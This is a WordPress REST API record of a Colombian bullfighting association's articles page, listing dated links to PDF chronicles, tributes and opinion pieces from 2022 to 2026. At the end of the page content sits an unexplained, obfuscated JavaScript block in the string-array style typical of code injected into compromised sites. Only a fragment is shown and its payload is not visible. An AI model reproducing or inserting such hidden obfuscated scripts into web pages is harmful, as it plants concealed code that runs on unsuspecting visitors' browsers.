{"id":38,"date":"2022-12-02T15:25:32","date_gmt":"2022-12-02T15:25:32","guid":{"rendered":"https:\/\/astauros.com.co\/?page_id=38"},"modified":"2026-04-06T18:22:06","modified_gmt":"2026-04-06T18:22:06","slug":"articulos","status":"publish","type":"page","link":"https:\/\/astauros.com.co\/index.php\/articulos\/","title":{"rendered":"ARTICULOS"},"content":{"rendered":"<p><em><strong>La opini\u00f3n y la cr\u00f3nica Taurina est\u00e1n presentes en este espacio.<\/strong><\/em><\/p>\n<p><em><strong>Selecciona y da click sobre el t\u00edtulo del art\u00edculo que desees leer.<\/strong><\/em><\/p>\n<hr \/>\n<p>05\/04\/2026<\/p>\n<p>Nuestro Presidente Jorge Humberto Z\u00fa\u00f1iga nos escribe un sentida p\u00e1gina en homenaje a Aura Luc\u00eda Mera<\/p>\n<p>(Para leer el art\u00edculo dar click en el siguiente enlace:)<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2026\/04\/TENDIDO-5-por-Jorge-Humberto-Zuniga.pdf\">TENDIDO 5 por Jorge Humberto Zu\u00f1iga<\/a><\/p>\n<p>Rodrigo Lloreda Mera dio esta emotiva despedida a Su Madre Aura Luc\u00eda Mera.\u00a0 \u00a0Astauros las comparte por ser la mejor expresi\u00f3n de Quien fue una gran Mujer.<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2026\/04\/PALABRAS-RODRIGO-LLOREDA.pdf\">PALABRAS RODRIGO LLOREDA<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>05\/02\/2025<\/p>\n<p>En estos tiempos donde todo se relativiza y se trivializa, no es sorpresa si alguna actividad que nos resulte incomoda se in-visibiliza.<\/p>\n<p>Resulta parad\u00f3jico que para el Departamento Nacional de Estad\u00edstica (DANE), la Tauromaquia y todas las actividades que convergen en ella pr\u00e1cticamente no existan, y no fueron incluidas en el \u00faltimo censo.<\/p>\n<p>Para leer todo el articulo, dar click sobre el siguiente enlace:<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2025\/02\/LA-LIBERTAD-INVISIBLE-por-Jorge-Garces-Franky.pdf\">LA LIBERTAD INVISIBLE por Jorge Garces Franky<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>08\/01\/2025<\/p>\n<p style=\"text-align: center;\"><strong>CRONICA DE HUMBERTO BOTERO DEL TERCER FESTEJO EN MANIZALES<\/strong><\/p>\n<p>Dar click en el siguiente enlace:<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2025\/01\/CANCION-EN-MANIZALES-por-Humberto-Botero-Jaramillo-Astauros-.pdf\">CANCION EN MANIZALES por Humberto Botero Jaramillo-Astauros-<\/a><\/p>\n<hr \/>\n<p>07\/01\/2025<\/p>\n<p style=\"text-align: center;\"><strong>CRONICAS DE MANIZALES<\/strong><\/p>\n<p>Nuestros compa\u00f1eros Humberto Botero Jaramillo y Daniel Sebasti\u00e1n R\u00edos, nos comparten unas amenas e interesantes cr\u00f3nicas sobre el indulto de cadenero en el festejo realizado el d\u00eda de ayer en \u00abLa Perla del Ruiz\u00bb.<\/p>\n<p>Dar click en los siguientes enlaces:<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2025\/01\/CADENERO-por-Humberto-Botero-Jaramillo-Astauros-.pdf\">CADENERO por Humberto Botero Jaramillo-Astauros-<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2025\/01\/UN-TORO-BRAVO-por-Daniel-Sebastian-Rios-Astauros-.pdf\">UN TORO BRAVO por Daniel Sebastian Rios-Astauros-<\/a><\/p>\n<hr \/>\n<p>29\/12\/2024<\/p>\n<p>CRONICA DEL TERCER FESTEJO DE 2024<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2025\/01\/LAS-GANAS-DE-TRIUNFO-por-Jorge-Garces-Franky-Astauros-.pdf\">LAS GANAS DE TRIUNFO por Jorge Garces Franky -Astauros-<\/a><\/p>\n<hr \/>\n<p>28\/12\/2024<\/p>\n<p><strong>CRONICA DEL SEGUNDO FESTEJO DE 2024<\/strong><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2025\/01\/UN-FESTEJO-DE-PRIMERA-por-Jorge-Garces-Franky-Astauros-.pdf\">UN FESTEJO DE PRIMERA por Jorge Garces Franky -Astauros-<\/a><\/p>\n<hr \/>\n<p>27\/12\/2024<\/p>\n<p><strong>CRONICA DEL PRIMER FESTEJO DE 2024<\/strong><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2024\/12\/CORRIDA-DE-TOROS-por-Jorge-Garces-Franky.pdf\">CORRIDA DE TOROS por Jorge Garces Franky<\/a><\/p>\n<hr \/>\n<p>09\/12\/2024<\/p>\n<p style=\"text-align: center;\"><strong>ESCALAFON DE MATADORES 2024<\/strong><\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\" wp-image-550 aligncenter\" src=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2024\/12\/CLASIFICACION-MATADORES-2024-225x300.png\" alt=\"\" width=\"335\" height=\"447\" srcset=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2024\/12\/CLASIFICACION-MATADORES-2024-225x300.png 225w, https:\/\/astauros.com.co\/wp-content\/uploads\/2024\/12\/CLASIFICACION-MATADORES-2024-768x1025.png 768w, https:\/\/astauros.com.co\/wp-content\/uploads\/2024\/12\/CLASIFICACION-MATADORES-2024.png 895w\" sizes=\"(max-width: 335px) 100vw, 335px\" \/><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>25\/06\/2024<\/p>\n<p style=\"text-align: center;\"><strong>\u00abLA DERROTA DE LA CULTURA\u00bb<\/strong><\/p>\n<p>Hoy en Colombia, lamentablemente el fundamentalismo animalista recoge una vez m\u00e1s las banderas de la intolerancia y expresa con regocijo su odio hacia la diferencia y hacia todo lo que le es desconocido.<\/p>\n<p>La estatua del Maestro C\u00e9sar Rinc\u00f3n que engalanaba los alrededores de la plaza de toros de Duitama ha sido derribada con el pretexto que el recinto ser\u00e1 transformado.<\/p>\n<p>Para leer completo el articulo, dar click sobre el siguiente enlace.<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2024\/06\/LA-DERROTA-DE-LA-CULTURA.pdf\">LA DERROTA DE LA CULTURA<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>22\/06\/2024<\/p>\n<p>Articulo del Dr. Humberto Botero Jaramillo sobre la realidad macro econ\u00f3mica Colombiana.<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2024\/06\/Diagnostico-Macroeconomico.pdf\">Diagnostico Macroeconomico<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>08\/04\/2024<\/p>\n<p>CRONICA DEL EVENTO CAMPERO DE ASTAUROS POR EL DR. HUMBERTO BOTERO JARAMILLO.<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2024\/04\/CRONICA-DEL-FESTEJO-DE-ASTAUROS-POR-HUMBERTO-BOTERO-JARAMILLO.pdf\">CRONICA DEL FESTEJO DE ASTAUROS POR HUMBERTO BOTERO JARAMILLO<\/a><\/p>\n<hr \/>\n<p>30\/01\/2024<\/p>\n<p>RESE\u00d1A LENGUAZAQUE ENERO 29 DE 2024 POR JULIAN VELASCO.<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2024\/01\/RESENA-LENGUAZAQUE-ENERO-29-DE-2024.pdf\">RESE\u00d1A LENGUAZAQUE ENERO 29 DE 2024<\/a><\/p>\n<hr \/>\n<p>16\/01\/2024<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2024\/01\/CRONICA-DE-DON-HUMBERTO-BOTERO.pdf\">CRONICA DE DON HUMBERTO BOTERO<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2024\/01\/CRONICA-DE-CESAR-\u00b4HERNANDEZ.pdf\">CRONICA DE CESAR \u00b4HERNANDEZ<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>06\/01\/2024<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2024\/01\/LA-ESENCIA-Y-LA-APARIENCIA.pdf\">LA ESENCIA Y LA APARIENCIA<\/a><\/p>\n<hr \/>\n<p>26\/12\/2023<\/p>\n<p style=\"text-align: center;\"><strong>NOVILLADA DE FERIA<\/strong><\/p>\n<p>CRONICA DE LA NOVILLADA DEL SERIAL CALE\u00d1O.<\/p>\n<p>PARA LEER EL ARTICULO HACER CLICK EN EL SIGUIENTE ENLACE:<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/12\/CRONICA-NOVILLADA-DE-FERIA-2023.pdf\">CRONICA NOVILLADA DE FERIA 2023<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>24\/12\/2023<\/p>\n<p>ARTICULO DE NUESTRO COMPA\u00d1ERO HUGO CUADROS SOBRE LA FAENA DE EMBARQUE DE LOS TOROS DE LA GANADERIA DE SALENTO, QUE SERAN LIDIADOS ESTE MIERCOLES EN CA\u00d1AVERALEJO.<\/p>\n<p>PARA LEER EL ARTICULO, HACER CLICK EN EL SIGGUIENTE ENLACE:\u00a0 <a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/12\/EL-EMBARQUE.pdf\">EL EMBARQUE<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>22\/12\/2023<\/p>\n<p>PALABRAS DEL MATADOR ENRIQUE CALVO \u00abEL CALI\u00bb AL RECIBIR EL RECONOCIMIENTO DE ASTAUROS COMO TAURINO DEL A\u00d1O EN LA VELADA DE LANZAMIENTO DE LA REVISTA # 21.<\/p>\n<p>PARA LEER EL TEXTO,\u00a0 HACER CLICK EN EL SIGUUIENTE ENLACE:<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/12\/PALABRAS-DE-ENRIQUE-CALVO-EL-CALI.pdf\">PALABRAS DE ENRIQUE CALVO -EL CALI<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>24\/11\/2023<\/p>\n<p style=\"text-align: center;\"><strong>ASTAUROS SE PUSO EN PR\u00c1CTICO<\/strong><\/p>\n<p>Amena rese\u00f1a de Nuestro Compa\u00f1ero Hugo Cuadros sobre el festival que brindaron los Aficionados pr\u00e1cticos Miembros de Astauros en La Hacienda El Alisal.<\/p>\n<p>PARA LEER EL ART\u00cdCULO HACER CLICK EN EL SIGUIENTE ENLACE:\u00a0 <a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/12\/ASTAUROS-SE-PUSO-EN-PRACTICO.pdf\">ASTAUROS SE PUSO EN PRACTICO<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>18\/09\/2023<\/p>\n<p style=\"text-align: center;\"><strong>JUAN DE CASTILLA<\/strong><\/p>\n<p><img decoding=\"async\" class=\"size-medium wp-image-344 aligncenter\" src=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/09\/thumbnail_IMG_8616-300x220.jpg\" alt=\"\" width=\"300\" height=\"220\" srcset=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/09\/thumbnail_IMG_8616-300x220.jpg 300w, https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/09\/thumbnail_IMG_8616-1024x750.jpg 1024w, https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/09\/thumbnail_IMG_8616-768x563.jpg 768w, https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/09\/thumbnail_IMG_8616-80x60.jpg 80w, https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/09\/thumbnail_IMG_8616.jpg 1536w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>En la ma\u00f1ana del domingo 18 de septiembre, los aficionados Taurinos en Cali est\u00e1bamos afanosos buscando la manera de ver en directo la corrida de toros desde la Plaza de Las Ventas en Madrid y donde confirmar\u00eda alternativa Nuestro Torero Paisa Juan de Castilla.\u00a0 <span style=\"color: #ff0000;\">PARA LEER EL ARTICULO COMPLETO HAZ CLICK EN EL SIGUIENTE ENLACE<\/span>:<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/09\/JUAN-DE-CASTILLA.pdf\">JUAN DE CASTILLA<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>04\/09\/2023<\/p>\n<p style=\"text-align: center;\"><strong>ESAU FERNANDEZ \u00abEL INDULTADOR\u00bb<\/strong><\/p>\n<p>\u00ab&#8230;.. Es Esa\u00fa lo que llamamos \u201cun pedazo de Torero,<\/p>\n<p>Ojal\u00e1 pudi\u00e9ramos verlo m\u00e1s seguido y en plazas de primera.\u00bb<\/p>\n<p>PARA VER EL ARTICULO COMPLETO, HAZ CLICK SOBRE EL SIGUIENTE ENLACE: <a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/09\/ESAU-FERNANDEZ.pdf\">ESAU FERNANDEZ<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>02\/09\/2023<\/p>\n<p style=\"text-align: center;\"><strong>ASTAUROS; COMPROMETIDOS CON CALI<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Por: Juan Gonzalo Montoya (Astauros)<\/strong><\/p>\n<p style=\"text-align: left;\">Astauros es una asociaci\u00f3n de periodistas y aficionados taurinos que vela por la difusi\u00f3n y protecci\u00f3n de la fiesta brava, tan arraigada en nuestro pa\u00eds y en nuestra Cali querida.\u00a0 PARA VER EL ARTICULO COMPLETO, HACER CLICK EN EL SIGUIENTE ENLACE:\u00a0 <a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/09\/TRABAJANDO-POR-CALI.pdf\">TRABAJANDO POR CALI<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>29\/08\/2023<\/p>\n<p style=\"text-align: center;\"><strong>MANUEL ESCRIBANO<\/strong><\/p>\n<p>Su nombre suena mucho, y desde aquel indulto a Cobradiezmos est\u00e1 referenciado para todos los taurinos, pero es incre\u00edble ver como no est\u00e1 \u201cacartelado\u201d de primera mano en las ferias principales y hay que verlo siempre en reemplazo de \u00faltima hora o en las plazas de segunda y tercera categor\u00eda.\u00a0 PARA LEER COMPLETO EL ARTICULO, HAZ CLICK SOBRE EL SIGUIENTE ENLACE:\u00a0 <a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/08\/MANUEL-ESCRIBANO.pdf\">MANUEL ESCRIBANO<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>21\/08\/2023<\/p>\n<p style=\"text-align: center;\"><strong>RICARDO CHIBANGA PRIMER TORERO AFRO\u00a0 \u00a0-Por: Juan Gonzalo Montoya-<\/strong><\/p>\n<p>Acaba de terminar en Cali con un \u00e9xito total el Petronio \u00c1lvarez, un festival maravilloso que enaltece la cultura afro del pacifico colombiano.<\/p>\n<p>La historia del toreo no est\u00e1 exenta de toreros afros y hoy vamos a hablar del primero que tomo la alternativa, se trata de Ricardo Chibanga. PARA VER EL ARTICULO COMPLETO HAZ CLICK EN EL SIGUIENTE ENLACE <a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/08\/RICARDO-CHIBANGA-PRIMER-TORERO-AFRO.pdf\">RICARDO CHIBANGA PRIMER TORERO AFRO<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>21\/08\/2023<\/p>\n<p style=\"text-align: center;\"><strong>CORRIDA MAGALLANICA &#8211; SEGUNDO INDULTO EN LA HISTORIA DE MIURA<\/strong><\/p>\n<p>Se institucionaliz\u00f3 hace apenas un lustro, y ya es un evento emblem\u00e1tico de la temporada espa\u00f1ola este festejo que se celebra en la Plaza de Sanl\u00facar de Barrameda, para conmemorar la primera vuelta al orbe que partiendo desde all\u00ed realizaron Fernando de Magallanes y Sus Pupilos en 1521.\u00a0 \u00a0 PARA VER EL ARTICULO COMPLETO HAZ CLICK SOBRE EL SIGUIENTE ENLACE\u00a0 \u00a0 <a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/08\/CORRIDA-MAGALLANICA.pdf\">CORRIDA MAGALLANICA<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p style=\"text-align: center;\"><strong>HISTORIA TAURINA DE CALI<\/strong><\/p>\n<p>Nuestro Compa\u00f1ero Juan Gonzalo Montoya nos ofrece un interesante art\u00edculo sobre la Historia Taurina de Nuestra Ciudad y nos invita a defender la tradici\u00f3n.<\/p>\n<p>Para ver el art\u00edculo completo, haz click sobre el siguiente enlace <a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/07\/HISTORIA-TAURINA-DE-CALI.pdf\">HISTORIA TAURINA DE CALI<\/a><\/p>\n<hr \/>\n<p style=\"text-align: center;\"><strong>\u00a1SAUL JIMENEZ FORTES!<\/strong><\/p>\n<p>Este nombre, que para muchos no dice nada y sobre el cual no est\u00e1n encendidos los reflectores de los medios, protagoniz\u00f3 esta tarde una gesta en solitario desde la localidad de Antequera.<\/p>\n<p>Para ver el art\u00edculo completo, haz click sobre el siguiente enlace: <a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/06\/SAUL-JIMENEZ-FORTES.pdf\">SAUL JIMENEZ FORTES<\/a><\/p>\n<hr \/>\n<p><img decoding=\"async\" class=\"wp-image-286 aligncenter\" src=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/04\/thumbnail_PHOTO-2023-04-26-13-16-20-300x281.jpg\" alt=\"\" width=\"254\" height=\"238\" srcset=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/04\/thumbnail_PHOTO-2023-04-26-13-16-20-300x281.jpg 300w, https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/04\/thumbnail_PHOTO-2023-04-26-13-16-20.jpg 565w\" sizes=\"(max-width: 254px) 100vw, 254px\" \/><\/p>\n<p style=\"text-align: center;\"><strong>\u00a1MORANTE!<\/strong><\/p>\n<p>Ante la dificultad de escoger un t\u00edtulo para este art\u00edculo, s\u00f3lo se nos ocurre el nombre de Quien hoy ha escrito una p\u00e1gina de parang\u00f3n en los anales de la Tauromaquia Universal.<\/p>\n<p>Y Quienes tuvimos el privilegio de verlo y sentirlo gracias al streaming, podremos contar que fuimos testigo de un acontecimiento que, como los cometas s\u00f3lo suceden cada cincuenta a\u00f1os.<\/p>\n<p>Para leer todo el art\u00edculo, hacer click sobre el siguiente enlace:\u00a0<a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2023\/04\/\u00a1MORANTE.pdf\">\u00a1MORANTE!<\/a><\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p><strong>TENTADERO.<\/strong><\/p>\n<p><strong>Nuestro Compa\u00f1ero Juli\u00e1n Velasco acompa\u00f1\u00f3 al Matador Emilio de justo y al Novillero Cristian Restrepo a Tienta con vacas del \u00abAlisal\u00bb y \u00abSantahermosa\u00bb.\u00a0<\/strong><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/TENTADERO-DE-LAS-GANADERIAS-EL-ALISAL-Y-SANTAHERMOSA.pdf\">TENTADERO DE LAS GANADERIAS EL ALISAL Y SANTAHERMOSA<\/a><\/p>\n<p><strong>ROCIO MORELLI TRIUNFADORA EN VILLAPINZON<\/strong><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/ROCIO-MORELLI-TRIUNFADORA-EN-VILLAPINZON.pdf\">ROCIO MORELLI TRIUNFADORA EN VILLAPINZON<\/a><\/p>\n<p><strong>HOMENAJE A CESAR RINCON Y COGIDA A GITANILLO DE AMERICA EN FESTIVAL EN VILLAPINZON\u00a0 \u00a0(Hacer click en el siguiente enlace)<\/strong><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/RESENA-VILLAPINZON-DIC-8-22.pdf\">RESE\u00d1A VILLAPINZON DIC 8-22<\/a><\/p>\n<p><strong>ROCIO MORELLI UNICA TORERA QUE SE PRESENTA EN CALI 2022<\/strong><\/p>\n<p>Por Lu Llanos (Especial para Astauros)\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Fotos: Juli\u00e1n Velasco (Astauros)<\/p>\n<p>Esta martes 6 de diciembre, Roc\u00edo Morelli lleg\u00f3 a Cali para promocionar la Feria de la libertad 2022 organizada por Tauroemoci\u00f3n Colombia. (Para leer todo el art\u00edculo hacer click en el siguiente enlace)<\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/ROCIO-MORELLI-UNICA-TORERA-QUE-SE-PRESENTA-EN-CALI-2022.pdf\">ROCIO MORELLI UNICA TORERA QUE SE PRESENTA EN CALI 2022<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/RESENA-VILLAPINZON-DICIEMBRE-4-2022-POR-JULIAN-VELASCO.pdf\">RESE\u00d1A VILLAPINZON DICIEMBRE 4 &#8211; 2022 (POR JULIAN VELASCO)<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/DIEGO-RAMOS-EL-PINTOR-QUE-QUISO-SER-TORERO.pdf\">DIEGO RAMOS EL PINTOR QUE QUISO SER TORERO<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/CIENCIA-FICCION-TAURINA.pdf\">CIENCIA FICCION TAURINA<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/EL-SENTIMENTALISMO-ANIMALISTA-PRIMERA-PARTE.pdf\">EL SENTIMENTALISMO ANIMALISTA PRIMERA PARTE<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/EL-SENTIMENTALISMO-ANIMALISTA-SEGUNDA-PARTE.pdf\">EL SENTIMENTALISMO ANIMALISTA SEGUNDA PARTE<\/a><\/p>\n<p><a href=\"https:\/\/astauros.com.co\/wp-content\/uploads\/2022\/12\/CORRIDAS-INCRUENTAS.pdf\">CORRIDAS INCRUENTAS<\/a><\/p>\n<p>&nbsp;<\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>La opini\u00f3n y la cr\u00f3nica Taurina est\u00e1n presentes en este espacio. Selecciona y da click sobre el t\u00edtulo del art\u00edculo que desees leer. 05\/04\/2026 Nuestro <a class=\"mh-excerpt-more\" href=\"https:\/\/astauros.com.co\/index.php\/articulos\/\" title=\"ARTICULOS\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-38","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages\/38","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/comments?post=38"}],"version-history":[{"count":54,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages\/38\/revisions"}],"predecessor-version":[{"id":728,"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/pages\/38\/revisions\/728"}],"wp:attachment":[{"href":"https:\/\/astauros.com.co\/index.php\/wp-json\/wp\/v2\/media?parent=38"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}